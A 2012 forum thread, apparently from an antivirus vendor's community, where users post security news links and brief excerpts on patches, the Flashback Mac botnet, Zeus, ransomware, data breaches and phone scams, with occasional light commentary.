If left unpatched, the flaws could cause a crash and allow an attacker to take control of a computer, the company said Wednesday. The update is for Flash Player versions 10 and 11 and applies to all operating systems, Windows, Mac OS X, Linux and Solaris.
http://www.crn.com/news/security/232700519/adobe-fixes-critical-security-flaws-in-flash-player.htm?cid=nl_sec
***
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to effect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/ (http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/)
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to effect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
That's because our banks here already know that if they run into a financial problem, someone will bail them out..... ;D
-
MasterCard, VISA Warn of Processor Breach
http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/
I read that article yesterday (from a link over at Wilders, IIRC), and it sounds like most of the improper activity resulting from the breach is in the New York City area, and directed more at corporate accounts than individuals.
I phoned my bank last night (which handles Visa) to confirm the problem wasn't likely to effect transactions up this way, and the service rep made the interesting observation that the U.S. is way behind most of the rest of the world in card security. According to him, it's one of the very few countries still using just the swipe-strip ... banks in most others, including Canada, added embedded complex chips to their cards some years back.
You are in Canada EH!
You do not have anything to worry about! ;)
You have the Canada Deposit Insurance Corporation to protect you! ;)
http://en.wikipedia.org/wiki/Canada_Deposit_Insurance_Corporation
-
Tweetdeck Offline After Apparent Bug Opens Up Access To “Hundreds” Of Accounts [Back Now]
http://techcrunch.com/2012/03/30/twitter-takes-tweetdeck-offline-after-apparent-bug-opens-access-to-accounts/
-
Hackers Can Steal Credit Card Information From Your Old Xbox
http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us
http://kotaku.com/5897876/microsoft-investigating-claim-that-used-xbox-360s-contain-credit-card-info
-
Hackers Plan to Take Internet Offline on Saturday
http://blogs.norman.com/2012/for-consumption/hackers-plan-to-take-internet-offline-on-saturday
hmmmm....... i am still online ;)
-
Malware Invades Pet Microchip, Implants Strange Behaviour
http://blogs.norman.com/2012/for-consumption/malware-invades-pet-microchip-implants-strange-behaviour
;D
-
hmmmm....... i am still online ;)
Me too, seems we "survived" the canard/"attack"... ;D
Funny that this was posted on March 30th instead of April 1st. ;)
-
FTC Charges That Security Flaws in RockYou Game Site Exposed 32 Million Email Addresses and Passwords
http://www.ftc.gov/opa/2012/03/rockyou.shtm
-
http://news.cnet.com/8301-1009_3-57409619-83/more-than-600000-macs-infected-with-flashback-botnet/
More than 600,000 Macs infected with Flashback botnet
-
The most favorite exploit being abused by the so-called "exploit packs" at the moment is Java-atomic exploit. This is a so-called 1-day exploit, just patched.
Please be protected against it by updating and patching your OS and third party software.
Go online and check your software here: http://secunia.com/vulnerability_scanning/online/
Overview of recent exploit pack exploits: http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html link article author = Mila
polonus
-
***
Apple Patches Java Bug
Apple released Wednesday a patch for multiple Java vulnerabilities, a couple of days after a security vendor reported that password-stealing malware exploiting the flaws was floating about the Web.
Apple launched Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7 almost two months after patches for the same exploits were released for Windows. Experts often criticize the Mac maker for taking too long to patch Java vulnerabilities.
http://www.crn.com/news/security/232800301/apple-patches-malware-targeted-java-bug.htm;jsessionid=6kAI4rxOXrN6u+7N+A+N8g**.ecappj02?cid=nl_crn
***
-
Microsoft Security Bulletin Advance Notification for April 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-apr
-
***
Malicious Malware: Six Ways Cybercriminals Beat Security
The tactics of cybercriminals has evolved from using malware-carrying spam in a shotgun-like approach to finding doorways into corporate networks to studying the prey like a methodical marksman, learning security controls and figuring out ways to bypass them.
http://www.crn.com/slide-shows/security/232800295/malicious-malware-six-ways-cybercriminals-beat-security.htm;jsessionid=uqNTJ4UWKBhfSOA41w1cPw**.ecappj02?cid=nl_sec
***
-
***
Seven Cybercrime-Fighting Steps For Small Businesses
These steps can also be used by administrators of home networks and individuals.
Cybercrime represents a $2 trillion annual business, representing 15 percent of the global production of goods and services, according to the United Nations. Each year, criminals hone their skills and tools to become more adept at penetrating computer systems to steal credit-card numbers and corporate as well as government secrets.
http://www.crn.com/slide-shows/security/232800231/seven-cybercrime-fighting-steps-for-small-businesses.htm?cid=nl_sec
***
-
***
Mac Botnet Infects More Than 600,000 Apple Computers
More than 600,000 Apple Mac computers worldwide—more than half of them in the United States—have been hit by a new fast-moving variant of the Flashback Trojan malware that uses Javascript code rather than relying on user interaction, according to security researchers.
Officials with security software company Intego said in an April 3 blog post that they found samples of the new Flashback Trojan March 23, and noted that the new malware—like the previous version discovered last year—uses two Java vulnerabilities, they said, one of which was patched by Apple April 3. The malware attacks Macs running the Mac OS X operating system. It was ... noted that 274 of the infected Macs were found in Cupertino, Calif., where Apple keeps its headquarters.
http://www.eweek.com/c/a/Security/Mac-Botnet-Infects-More-Than-600000-Apple-Computers-699749/?kc=EWKNLEDP04062012B
***
-
more on the above
http://www.theregister.co.uk/2012/04/05/flashback_trojan_botnet/
Attackers first began to exploit two earlier Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353) to spread malware in February 2012, before switching to another exploit (CVE-2012-0507) on 16 March – to devastating effect. ®
appel is not the fastest to patch java bugs
http://www.computerworld.com/s/article/9134442/Apple_finally_patches_six_month_old_Java_bugs
http://www.crn.com/news/security/232800152/mac-malware-exploits-apple-delay-with-java-patch.htm
http://www.theregister.co.uk/2012/04/04/apple_java_update/
-
Fake cop Trojan 'detects offensive materials' on PCs, demands money - Crooks exploit those embarrassing files we all have
http://www.theregister.co.uk/2012/04/05/police_themed_ransomware/
Trojan:W32/Reveton
http://www.f-secure.com/v-descs/trojan_w32_reveton.shtml
-
Prenotification Security Advisory for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb12-08.html
-
***
Mac Botnet Infects More Than 600,000 Apple Computers
More than 600,000 Apple Mac computers worldwide—more than half of them in the United States—have been hit by a new fast-moving variant of the Flashback Trojan malware that uses Javascript code rather than relying on user interaction, according to security researchers.
Officials with security software company Intego said in an April 3 blog post that they found samples of the new Flashback Trojan March 23, and noted that the new malware—like the previous version discovered last year—uses two Java vulnerabilities, they said, one of which was patched by Apple April 3. The malware attacks Macs running the Mac OS X operating system. It was ... noted that 274 of the infected Macs were found in Cupertino, Calif., where Apple keeps its headquarters.
http://www.eweek.com/c/a/Security/Mac-Botnet-Infects-More-Than-600000-Apple-Computers-699749/?kc=EWKNLEDP04062012B
***
I've been reading about this, Now they're saying it's bigger(On Macs) than Conficker was on Windows..
http://www.pcworld.com/businesscenter/article/253403/mac_malware_outbreak_is_bigger_than_conficker.html#tk.nl_dnx_h_crawl
If a Mac user has this, There's manual removal instructions here:
http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml
-
Anonymous targets UK Government sites with DDoS
http://www.h-online.com/security/news/item/Anonymous-targets-UK-Government-sites-with-DDoS-1517438.html
-
***
Utah Data Breach of 181,000 Records Blamed on Configuration Error
Nearly 200,000 people who receive benefits from the Medicaid and Child Health Insurance Plan in Utah have had their personal information--including Social Security numbers in some cases--compromised as part of an intrusion on the network at the Utah Department of Technology Services. The 181,000 estimated victims is nearly eight times higher than the 24,000 people that the department initially thought were affected by the attack.
http://www.crnbuzz.com/index.php?r88r=/story/v1_left/html/CRN.v1.security/5364332f5556424673347879364448333555556a50413d3d
***
-
***
FBI: Smart Meter Hacks Likely to Spread
A series of hacks perpetrated against so-called “smart meter” installations over the past several years may have cost a single U.S. electric utility hundreds of millions of dollars annually, the FBI said in a cyber intelligence bulletin obtained by KrebsOnSecurity. The law enforcement agency said this is the first known report of criminals compromising the hi-tech meters, and that it expects this type of fraud to spread across the country as more utilities deploy smart grid technology.
http://krebsonsecurity.com/2012/04/fbi-smart-meter-hacks-likely-to-spread/
***
-
***
Watch Out, White Hats! European Union Moves to Criminalize ‘Hacking Tools’
The European Union is continuing a push to criminalize the production or sale of “hacking” tools, a move that civil liberties advocates argue could make criminals out of legitimate security researchers.
The proposal is intended to create stiffer penalties across Europe for hacking and denial of service attacks, imposing a maximum sentence of up to five years for hacking into a site or using a botnet to flood a site with fake traffic.
In my opinion, 5 years is way too lenient. The sentence should be, at the least, 2x that amount for real criminals.
On the other hand, legitimate security researchers should not be charged.
http://www.wired.com/threatlevel/2012/04/hacking-tools
***
-
***
Selling You on Facebook
Many popular Facebook apps are obtaining sensitive information about users—and users' friends—so don't be surprised if details about your religious, political and even sexual preferences start popping up in unexpected places.
http://online.wsj.com/article/SB10001424052702303302504577327744009046230.html
***
-
https://drweb.com/flashback/
https://drweb.com/flashback/chronology/
http://support.apple.com/kb/HT5244?viewlocale=en_US&locale=en_US
-
Zeus Targets Cloud Payroll Service to Siphon Money from Enterprises
http://www.trusteer.com/blog/zeus-targets-cloud-payroll-service-siphon-money-enterprises
-
HP distributes malware in flash card included in new networking kit.
http://www.theregister.co.uk/2012/04/11/hp_ships_malware_cards_with_switches_oops/ (http://www.theregister.co.uk/2012/04/11/hp_ships_malware_cards_with_switches_oops/)
-
Trojan.Encoder heads West.
http://news.drweb.com/show/?i=2356&lng=en&c=5
-
New targeted Mac OS X Trojan requires no user interaction
"A new Mac OS X Trojan referred to as Backdoor.OSX.SabPub.a or SX/Sabpab-A is also exploiting Java vulnerabilities in a way that requires no user interaction. It is being used in targeted attacks"
http://www.zdnet.com/blog/security/new-targeted-mac-os-x-trojan-requires-no-user-interaction/11545
-
Critical vulnerability in IrfanView plugin
http://www.h-online.com/security/news/item/Critical-vulnerability-in-IrfanView-plugin-1539532.html
-
New version of Mac OS X Trojan exploits Word, not Java
http://www.zdnet.com/blog/security/new-version-of-mac-os-x-trojan-exploits-word-not-java/11566?tag=content;siu-container
-
New version of Mac OS X Trojan exploits Word, not Java
http://www.zdnet.com/blog/security/new-version-of-mac-os-x-trojan-exploits-word-not-java/11566?tag=content;siu-container
Uh Uh... Mac infections are coming and coming... ;D
-
Oracle Critical Patch Update Advisory - April 2012
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
-
Rmnet.12 created a million Windows computer botnet
http://news.drweb.com/show/?i=2374&lng=en&c=5
-
Websites using 14 tracking tools to nab your data, says Truste research
http://www.dailytelegraph.com.au/technology/websites-using-14-tracking-tools-to-take-your-data-says-truste/story-fn7bsi21-1226333237000
-
Google warns the operators of thousands of hacked web sites
http://www.h-online.com/security/news/item/Google-warns-the-operators-of-thousands-of-hacked-web-sites-1542374.html
-
Fake Instagram app infects Android devices with malware
http://nakedsecurity.sophos.com/2012/04/18/fake-instagram-app-android-malwar/
-
Doctor Web doesn't register significant decrease in BackDoor.Flashback.39 bot number
http://news.drweb.com/show/?i=2386&lng=en&c=5
-
***
Web Apps Create New Security Risks
There's no debate that security is growing infinitely more complex by the day. As organizations open their networks to customers, business partners and others, the risks continue to grow. Mobile devices and open-source codes further complicate matters--all while hackers and cyber-crooks become more sophisticated and aggressive. Although most organizations have a spate of digital security protections in place, a March 2011 study found that many of the most obvious threats go unnoticed and untargeted. What's more, the situation is growing more challenging.
http://www.baselinemag.com/c/a/Security/Web-Apps-Create-New-Security-Risks-367935/?kc=EWKNLEDP04202012C
***
-
***
Internet Founder Berners-Lee: CISPA a Threat to Privacy Rights
A must read ...
Tim Berners-Lee, the man credited with inventing the Internet and a staunch advocate for a free and open Web, is the latest to wade into the fray, telling the British publication The Guardian that CISPA not only puts U.S. citizens at risk, but also people around the world.
The legislation “is threatening the rights of people in America, and effectively rights everywhere, because what happens in America tends to affect people all over the world,” Berners-Lee said in the interview. “Even though the SOPA and PIPA acts were stopped by huge public outcry, it’s staggering how quickly the U.S. government has come back with a new, different threat to the rights of its citizens.”
Berners-Lee’s comments came as part of a larger discussion about similar legislation being proposed by the British government. Both proposals represented a dangerous expansion of government surveillance capabilities that threaten the basic human rights of citizens, he said.
http://www.eweek.com/c/a/Security/Internet-Founder-BernersLee-CISPA-a-Threat-to-Privacy-Rights-436464/?kc=EWKNLEDP04202012D
***
-
Internet Founder Berners-Lee: CISPA a Threat to Privacy Rights
More here: http://forum.avast.com/index.php?topic=66267.msg776837#msg776837
CISPA Petition: https://secure.avaaz.org/en/stop_cispa/
-
Malware Learns to Avoid Web-Based Anti-Virus
http://blogs.norman.com/2012/for-consumption/malware-learns-to-avoid-web-based-anti-virus
Using a VPN Doesn’t Mean Your Information Is Safe When You Travel
http://blogs.norman.com/2012/security-exposed/using-a-vpn-doesnt-mean-your-information-is-safe-when-you-travel
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
Asyn is being anonymous and so am I. ;D
-
FBI seizes US anonymisation server
http://www.h-online.com/security/news/item/FBI-seizes-US-anonymisation-server-1544886.html
Asyn is being anonymous and so am I. ;D
Well, I'm not really anonymous with just adding a ".B" to my name. ;)
Anyway, a nice avatar Bob.
-
WordPress fixes file upload security problems
http://www.h-online.com/security/news/item/WordPress-fixes-file-upload-security-problems-1545416.html
http://wordpress.org/news/2012/04/wordpress-3-3-2/
-
***
Russian Security Firm Says Flashback Botnet Is Not Shrinking
Contrary to recent reports, the worldwide botnet of Macs infected with the Flashback malware has remained relatively steady in size, the Russian security vendor Dr. Web said over the weekend.
Dr. Web discovered the botnet -- which it calls BackDoor.Flashback.39 -- on April 4. It claims that more than 817,000 bots have connected to the botnet thus far, and that an average of 550,000 infected machines are interacting with a command-and-control server each day.
New infected machines that have not yet been registered in the botnet -- and which cannot yet be tracked -- are joining every day, according to Dr. Web.
Dr. Web's latest findings contradict those of Symantec and Kaspersky Lab, which earlier this month reported that the Flashback botnet had shrunk to less than half its peak size of 650,000 infected machines due to Apple's work with Internet service providers to take down command-and-control servers and the release of malware removal tools from third parties.
http://www.crn.com/news/security/232900794/russian-security-firm-says-flashback-botnet-is-not-shrinking.htm;jsessionid=MFnY1U++W2e06EL0spmQkw**.ecappj03?cid=nl_sec
***
-
Beware of dangerous Trojan in spam
http://news.drweb.com/show/?i=2406&lng=en&c=5
-
Doctor Web analyzes objects downloaded by BackDoor.Flashback onto infected Macs
http://news.drweb.com/show/?i=2410&lng=en&c=5
-
Online forums hacked and misused on a large scale
http://www.h-online.com/security/news/item/Online-forums-hacked-and-misused-on-a-large-scale-1558917.html
-
E-Mail, Source Code From VMWare Bubbles Up From Compromised Chinese Firm
http://threatpost.com/en_us/blogs/e-mail-source-code-vmware-bubble-compromised-chinese-firm-042412
http://blogs.vmware.com/security/2012/04/vmware-security-note.html
-
Four Doomsday Scenarios for Internet-Enabled Toasters
http://blogs.norman.com/2012/for-consumption/four-doomsday-scenarios-for-internet-enabled-toasters
TV-based botnets? DoS attacks on your fridge? More plausible than you think
http://arstechnica.com/business/news/2012/04/tv-based-botnets-ddos-attacks-on-your-fridge-more-plausible-than-you-think.ars
-
Kaspersky: Apple security is like Microsoft's in 2002
http://www.theregister.co.uk/2012/05/02/kaspersky_apple_flashback_microsoft/
Dr. Web disputes Flashback Mac Trojan bot army estimates
http://www.theregister.co.uk/2012/04/25/flashback_mac_trojan_update/
-
***
VMware Releases Expedited Patches For ESX Source Code Leak
VMware on Thursday released security patches for products it says could face heightened risk due to last month's ESX server hypervisor source code leak.
The patches address five "critical security issues" in VMware's Workstation, Player, ESXi and ESX products, the Palo Alto, Calif.-based vendor said in a security bulletin. All five vulnerabilities could enable an attacker to execute code on the host; two require root or administrator level permissions and two do not.
http://www.crn.com/news/data-center/232901420/vmware-releases-expedited-patches-for-esx-source-code-leak.htm;jsessionid=vLil9xCQLdS2fQYplc8r6A**.ecappj01?cid=nl_crn
***
-
***
Attackers Add Ransomware to Bank Fraud Malware
A notorious malware platform targeting financial information has added a new trick to its portfolio—a digital version of hijack and ransom.
According to security firm Trusteer, the Citadel malware platform is delivering ransomware that hijacks victims' computers. Ransomware works by restricting access to infected computer systems so that the attackers can extort payment in exchange for restoring access.
In this case, the ransomware, known as Reveton, locks the compromised computer down and displays a message demanding $100 to unfreeze it. The demand poses as a message from the U.S. Department of Justice and claims the computer's operating system has been locked due to the presence of child pornography.
http://www.eweek.com/c/a/Security/Attackers-Add-Ransomware-to-Bank-Fraud-Malware-Security-Researchers-611150/?kc=EWKNLEDP05042012E
***
-
New Adobe Flash Update, Version 11.2.202.235 for IE
http://forums.cnet.com/7723-6132_102-562428/security-update-available-for-adobe-flash-player-apsb12-09/?tag=contentMain;contentAux (http://forums.cnet.com/7723-6132_102-562428/security-update-available-for-adobe-flash-player-apsb12-09/?tag=contentMain;contentAux)
Release posted today, exploit active in the wild. Old version 11.2.202.233 IE Affects IE and activeX components only.
-
Skype divulges user IP addresses
http://www.h-online.com/security/news/item/Skype-divulges-user-IP-addresses-Update-1564236.html
http://skype-open-source.blogspot.com/2012/04/skype-user-ip-address-disclosure.html
-
If you already permit geo location, it really isn't a big deal. If you don't, then it's a different story.
(http://my.jetscreenshot.com/2701/m_20120505-u4lh-84kb.jpg) (http://my.jetscreenshot.com/2701/20120505-u4lh-84kb)
-
Also see this malware geolocation service abuse: -http://community.websense.com/blogs/securitylabs/archive/2012/05/03/widespread-malware-abuses-unsecured-geolocation-service-of-adult-website.aspx (link Websense Security Labs Blog)
polonus
-
Microsoft Security Bulletin Advance Notification for May 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-may
-
Worried about Mac malware? Just set up OpenDNS.
http://blog.opendns.com/2012/04/09/worried-about-mac-malware-just-set-up-opendns/?utm_source=nl0512&utm_medium=em&utm_campaign=home
OpenDNS + CloudFlare == DNSChanger solution. Or, how to not lose Internet on July 9.
http://blog.opendns.com/2012/05/03/opendns-cloudflare-dnschanger-solution-or-how-to-not-lose-internet-on-july-9/
-
Don't use the Facebook Like Button in the USA
http://news.yahoo.com/liking-something-facebook-not-protected-first-amendment-193018772.html
-
Oracle makes SSL use in database clusters free
http://www.h-online.com/security/news/item/Oracle-makes-SSL-use-in-database-clusters-free-1565661.html
-
Privacy concerns over popular ShowIP Firefox add-on
http://nakedsecurity.sophos.com/2012/05/01/privacy-concern-showip-firefox-add-on/
-
Religious Websites Worse Than Porn (For Viruses)
http://blogs.norman.com/2012/for-consumption/religious-websites-worse-than-porn-for-viruses
Unusual cyber attack targets continue: This time Ethiopia
http://blogs.norman.com/2012/security-research/unusual-cyber-attack-targets-continue-this-time-ethiopia
-
Online Armor blocking Flash Player updates.
http://support.emsisoft.com/topic/7839-flash-update-being-blocked/
Bummer. Switched to Private Firewall...for now. ???
-
Firefox security bug (proxy-bypass) in current TBBs
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
-
Android malware opens back door to the intranet
http://www.h-online.com/security/news/item/Android-malware-opens-back-door-to-the-intranet-1567374.html
-
Critical open hole in PHP creates risks
http://www.h-online.com/security/news/item/Critical-open-hole-in-PHP-creates-risks-1567532.html
-
This is my first post so as to basically introduce myself and also to ask for a bit of advice re Security, so I hope I am in the right place!
I am now a retired Mechanical/Electronics Engineer plus I was a Professional Driving Instructor for 12 years just before retirement and hopefully still have most of my ‘marbles’!! My home is Essex G.B., too near London for comfort re traffic and parking problems!
I have joined this forum as I am having problems with Avast on my self built 7 years ago P.C.. Briefly I have built a few PC’s over the years mainly for my own and family use. I started off in the early 80’s with Windows 95 progressing through each Windows upgrade to what I am using currently Windows XP Home Service Pack 3. I am not into programming by the way. My present PC is 7 years of age and consists of an Abit NF7 vs. 2 Motherboard, 1.5Gb Ram, Radeon 9200 series graphics, one on board 500Gb (C) h/d, plus one onboard 250Gb (D) h/d, two USB drives consisting of a 1T/byte My Book and an 8Gb key, yes I am very aware this is a very basic machine by today’s standards, but it does everything, (so far) of what I need from a computer.
I have for some time been using mainly trouble free and up to date versions of Super Antispyware, Comodo Firewall and Avast Antivirus. A couple of weeks ago Avast suddenly informed me that my system was/is still ‘Unsecured’ and ever since apparently refuses to Update both Engine and Virus Definitions. The Avast ‘FIX NOW’ button ignores the request; also there is a red cross on the Avast tray icon. However in Control Panel/Security Centre, Comodo Firewall is ‘On’ and ‘Avast Antivirus is also ‘On’ and is reported as ‘up to date and virus scanning is on’, as it always was! So can anyone throw any light on why for the past two or so weeks I have been plagued with confusing messages? The P.C. in general appears to be running OK. Many thanks for any advice
-
Please create your own new topic as this is unrelated to your problem. This topic isn't a problem solving/reporting on but for posting security based warnings and or notices (unrelated to avast as such).
- Please start a New Topic of your own here http://forum.avast.com/index.php?board=2.0 (http://forum.avast.com/index.php?board=2.0) (click the New topic button at the top of the page see image) as this is unrelated to the original subject and will just confuse the topic and we will try to help.
-
Re: Critical open hole in PHP creates risks
@Asyn,
The patch for the vulnerability is going to be available for download to-night.
Recent abuse: http://blog.spiderlabs.com/2012/05/honeypot-alert-active-exploit-attempts-for-php-cgi-vuln.html link article author: Ryan Barnett
polonus
-
Skype divulges user IP addresses
http://www.h-online.com/security/news/item/Skype-divulges-user-IP-addresses-Update-1564236.html
http://skype-open-source.blogspot.com/2012/04/skype-user-ip-address-disclosure.html
this happens when some 'genius' decide that the Avatar's picture and informations are 'filetransfer'
and instead of using your UID/session ID to route it thru supernodes
it will use direct p2p connectivity and share all the info with the other side
seriously Microsoft ofering GBs of cloud data on Skydrive but can't host avatar picture and info data of Skype users :)
-
VMware address critical issues in Workstation, Player, ESXi and ESX
http://www.h-online.com/security/news/item/VMware-address-critical-issues-in-Workstation-Player-ESXi-and-ESX-1568119.html
http://www.vmware.com/security/advisories/VMSA-2012-0009.html
-
Re: Critical open hole in PHP creates risks
@Asyn,
The patch for the vulnerability is going to be available for download to-night.
Thanks pol.
Here it is: http://www.php.net/archive/2012.php#id2012-05-08-1
-
***
Apple iOS 5.1.1 Released to Address Security Issues
Apple's latest update for its mobile devices, iOS 5.1.1, is released to fix annoying bugs and some serious security issues.
Apple released the latest update to its iOS software for the iPhone, iPod touch and iPad to fix bugs and repair security issues. The iOS 5.1.1 addresses bugs that could prevent the new iPad from switching between 2G and 3G networks and fixes bugs that affected AirPlay video playback in some circumstances, as well as security issues concerning Apple's Safari browser. The update can be downloaded via Apple’s Website, iTunes or over the air on compatible devices.
http://www.eweek.com/c/a/Mobile-and-Wireless/Apple-iOS-511-Released-to-Address-Security-Issues-124181/?kc=EWKNLEDP05092012B
***
-
Apple Legacy Filevault Hole
http://cryptome.org/2012/05/apple-filevault-hole.htm
-
Thousands of Twitter passwords allegedly exposed
http://www.h-online.com/security/news/item/Thousands-of-Twitter-passwords-allegedly-exposed-1571195.html
-
Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections
http://www.ic3.gov/media/2012/120508.aspx
-
Sniffer tool displays other people's WhatsApp messages
http://www.h-online.com/security/news/item/Sniffer-tool-displays-other-people-s-WhatsApp-messages-1574382.html
-
Plaxo - Google Account “Suspicious Activity” & Next Steps
http://blog.plaxo.com/2012/05/google-account-%E2%80%9Csuspicious-activity%E2%80%9D-next-steps/
-
Dr.Web CureIt! 7.0 beta testing launched
http://news.drweb.com/show/?i=2401&lng=en&c=5
https://www.freedrweb.com/download+cureit+free/beta/?lng=en
Win32.Rmnet.16 attacks UK and Australia
http://news.drweb.com/?i=2434&c=5&lng=en&p=0
-
Bitcoinica Bitcoin site breached
http://www.h-online.com/security/news/item/Bitcoinica-Bitcoin-site-breached-1574907.html
http://www.bitcoinica.com/2012/05/bitcoinica-security-breach.html
-
Notepad++ web site compromised
http://www.h-online.com/security/news/item/Notepad-web-site-compromised-1575263.html
-
Malicious use of Catchme to remove security plug-ins: Interesting: http://blog.trendmicro.com/info-stealer-poses-as-google-chrome-installer/
link article author is Brian Cayanan (Threats Analyst)
Several Brazilian banks use a program called GbPlugin for customers during Internet banking to protect. The malware, however, uses the software security firm GMER's Catchme to remove this security plugin.
Catchme is designed to remove malware, but the malversants will use it to the contrary to remove protective security software.
Meanwhile, more than 3,000 unique IP addresses are being infected with mentioned Trojan horse,
polonus
-
Watch Out for the Windows Telephone Scam
http://blogs.norman.com/2012/for-consumption/watch-out-for-the-windows-telephone-scam
and here you can listen to recorded phone scam
Fake tech support call scam – supportonclick, systemrecure and logmein123.com
http://www.digitaltoast.co.uk/supportonclick-systemrecure-scam
-
That really is an old one with a different name, previously this was calling themselves 'Microsoft Support' as opposed to Windows Support.
These scum have been pulling these type of telephone scams for some time.
-
Another phone call scam but this is on behalf of Google.
http://www.bleepingcomputer.com/forums/topic453721.html
-
***
Facebook, Gmail, Hotmail, Yahoo Users Hit by Zeus Debit Card Scam
A malware campaign targeting Facebook, Google Mail, Hotmail and Yahoo user debit card data has been linked to the infamous Zeus Trojan.
Zeus is one of the most prevalent pieces of financial malware on the Web. During the past several years, Zeus variants have been linked to major criminal operations around the globe, including one that prompted the FBI to issue a warning in January. In that case, a variant known as Gameover was observed stealing password and user name information for financial institutions.
http://www.eweek.com/c/a/Security/Facebook-Gmail-Hotmail-Yahoo-Users-Hit-By-Zeus-Debit-Card-Scam-886976/?kc=EWKNLEDP05182012D
***
-
ZTE Score M Android Phone Found to Have Backdoor Installed
http://threatpost.com/en_us/blogs/report-zte-score-m-android-phone-found-have-backdoor-installed-051812
-
Lily Jade, Cross Browser Worm spreads through Facebook
http://facecrooks.com/Scam-Watch/lily-jade-cross-browser-worm-spreads-via-facebook.html
-
Zeus bot comes now also as ransomware: http://www.f-secure.com/weblog/archives/00002367.html (link authors: Mikko S. and Marko)
polonus
-
Global Payments breach reportedly worse than expected
http://www.h-online.com/security/news/item/Global-Payments-breach-reportedly-worse-than-expected-1578956.html
-
***
IPv6 and Security: The Threat From Version 4
The official launch date for IPv6 is right around the corner, making June 6 famous for even more than the historic WW II invasion of Normandy. It might make the invasion of your customers’ networks more possible than ever before.
The higher threat level, according to Carl Herberger, vice president of security at Radware, lies in the fact that while IPv6 will be the new standard at the wide area, the local area will continue to be the near exclusive domain of IPv4. And since the two versions were not designed to co-exist, there are some gaping holes in security.
“You basically need to translate Version 6 to Version 4 and we can do that by encapsulation,” Herberger explained to CRN. “And the encapsulation standards are all over the map. This situation causes problems with security inspections because if I can send an attack that exploits Version 4 vulnerabilities through a Version 6 inspection module, I’ve got a pretty high chance of success because the Version 6 inspection module will not be able to read it. And we haven't been able to resolve this problem yet.
http://www.crn.com/news/security/240000767/ipv6-and-security-the-threat-from-version-4.htm?cid=nl_sec
***
-
Anonymous leaks US government crime statistics data
http://www.h-online.com/security/news/item/Anonymous-leaks-US-government-crime-statistics-data-1581535.html
-
Virut the dangerous and destructive file infector malware with us now for 5 years, is making a comeback:
http://vrt-blog.snort.org/2012/05/resurgence-of-virut.html (link article author = ALAIN ZIDOUEMBA)
polonus
-
Facebook account cancellation malware poses as Adobe Flash update
http://nakedsecurity.sophos.com/2012/05/21/facebook-account-cancellation-malware-adobe-flash-update/
-
Thousands affected in billing cloud breach
http://www.scmagazine.com.au/News/301773,thousands-affected-in-billing-cloud-breach.aspx
http://blog.whmcs.com/?t=47717
-
Google warns DNSChanger victims
http://www.h-online.com/security/news/item/Google-warns-DNSChanger-victims-1583037.html
-
How to Keep Your Facebook Data Private from Apps
http://blogs.norman.com/2012/for-consumption/how-to-keep-your-facebook-data-private-from-apps
-
Text message provider to pay out for Android malware
http://www.h-online.com/security/news/item/Text-message-provider-to-pay-out-for-Android-malware-1585215.html
-
Text message provider to pay out for Android malware
http://www.h-online.com/security/news/item/Text-message-provider-to-pay-out-for-Android-malware-1585215.html (http://www.h-online.com/security/news/item/Text-message-provider-to-pay-out-for-Android-malware-1585215.html)
The text message provider was actually fined for distributing malware.
-
No country is safe from 'Flame Super-virus'
http://www.news.com.au/technology/no-country-is-safe-from-flame-super-virus-attack-kaspersky-labs/story-e6frfro0-1226370960217
http://www.techweekeurope.co.uk/news/flamer-cyber-attack-iran-80049
-
Microsoft Warns Of Ongoing Conficker Infections
http://www.techweekeurope.co.uk/news/microsoft-ongoing-conficker-75066
-
***
Romanian Police Arrest Anonymous Hackers
Romanian Police on Monday announced that they had wiped out the local branch of the Anonymous hacker group after detaining 12 of its members.
On Monday police raided the homes of the members in ten towns and cities across the country, searching for evidence, including files and personal computers.
“The head of the group was 24-year-old Gabriel Balaneasa who, together with other two people, created the Anonymous group in Romania. This group accessed and compromised 29 websites in Romania and abroad,” police said in a press release.
http://www.balkaninsight.com/en/article/romanian-police-arrests-local-hackers
***
-
***
DOJ Hack Emphasizes the Need for Smart Cybersecurity Action
Last week, the U.S. Justice Department acknowledged that its Bureau of Justice Statistics website had been hacked. The hacker group Anonymous claimed credit for the hack and published 1.7 gigabytes of data. Included in the data were internal e-mails, which possibly contained personal or sensitive information related to crimes, criminals, and crime victims.
